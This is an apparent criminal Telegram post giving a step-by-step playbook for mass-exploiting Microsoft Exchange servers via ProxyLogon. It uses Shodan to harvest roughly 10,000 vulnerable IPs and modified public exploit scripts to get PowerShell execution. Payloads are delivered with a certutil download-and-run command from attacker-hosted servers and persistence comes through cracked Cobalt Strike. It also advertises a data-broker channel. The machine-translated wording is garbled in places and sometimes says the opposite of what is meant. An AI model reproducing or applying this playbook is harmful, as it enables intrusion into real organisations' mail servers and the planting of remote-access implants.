2021-06-28 13:00:40
What is ProxyLogon?
ProxyLogon is formally the common name for CVE-2021-26855, a vulnerability in Microsoft Exchange Server that allows an attacker to bypass authentication and impersonate an administrator. We also linked this bug to another arbitrary file vulnerability CVE-2021-27065 after authorization associated with a record in order to get code execution. All affected components are vulnerable by default !
As a result, no unauthenticated attacker can execute arbitrary commands on a Microsoft Exchange Server through the only open port 443 !
What do we need?
1) This is ProxyLogon itself, for me the best implementation of this CVE from the author Udyzhttps "https://github.com/Udyz"
"A modified script will be available only to private channel members"
2) Cobalt Strike [latest cracked available for private members of https://t.me/data_brokers]
3) Invoke-Obfuscation for Powershell
4) IEX & CERTUTIL.EXE
The attack will take place in 3 parts
1) Collecting Material, Reconnaissance
2) Penetration into the network
3) Fixing in the network
Let's start with collecting the Material, I have laid out the "Manual for Shodan" so it will help us to collect a lot of material at once, for tests penetration into the network.
EXAMPLE:
Insert the key I have laid out, write ---- >>shodan download exchange.json.gz vuln: cve-2021-26855 will give plus or minus 10k vulnerable IP addresses ..
All at the moment I told you where to look at once and a lot of mate, plus the fact that immediately vulnerable ..
After shodan will deflate everything write the command ---- >>>> gzip -d exchange.json.gz
After parsing the IP address from the json file ---- >>>> shodan parse exchange.json.gz --fields = ip_str> vuln.txt
On This completes the collection of the material, then comes the exploration of the material, what it is, which IP where it belongs, etc.
We take the parser, I will post this parser below along with other scripts.
rename exchange.txt to iplist.txt wait,
After the parser parses the IP addresses, the output.txt file will be saved, where there will be domains for each IP, here, after breaking through, you can take the software laid out by Boris, everyone's business.
Well, this is where the exploration of the Material ends, what kind of ip it refers to as well as Revene.
Step two, scan vulnerable IPs for SSRF.
Authorization from the login list was cut out from the script, and only 2 logins left by me are administrator & admin, with spn 500, why I cut out everything else and left only 2 ipishki, but because logins other than these two cannot log in and scan to let there will be 20-30 100 pieces, this is a waste of time.
run the proxy.py script - >> let's go drink tea, coffee, beer ..
after a time of 10k ip are checked and are in output.txt we can do this, after proxy.py has finished its work, we drop ipishki into pars.py and wait for the result which domains issued, we come across different jealousies, from 300k to 5kkk.
We take the script of the Author's AutoProxyLogon.py, leave only 2 administrator & admin logins in the text editor, change the author's script from cmd / c to powershell / c and the line below as well ..
and Voila, we have access to the Typewriter and already with powershell open - try the first option, at that time I have 3 vps, on the first Cobalt Strike on 2 teamserver, on 3 I will not tell a secret!
There are 2 generation options as well as delivery, the first raising the load in Cobalt, the second generation of payload exe with loading on the same AnonFiles, and delivery to a typewriter, CERTUTIL.EXE, sometimes it is # fucked on the validity of the site certificate, 2/3 creation option Payload Generator Script (S) web delivery ie. --- >>> Figured out how we will make delivery.
All generated payloads were raised on the server via web delivery, we go to the victim's terminal, that is, to our own, write certutil.exe -urlcache -split -f http: // {ip} {or domain} /shell.exe shell.exe, I I did everything through ngrok to understand whether there was delivery to the victim's computer or not, 200 ok.
241 views10:00
B
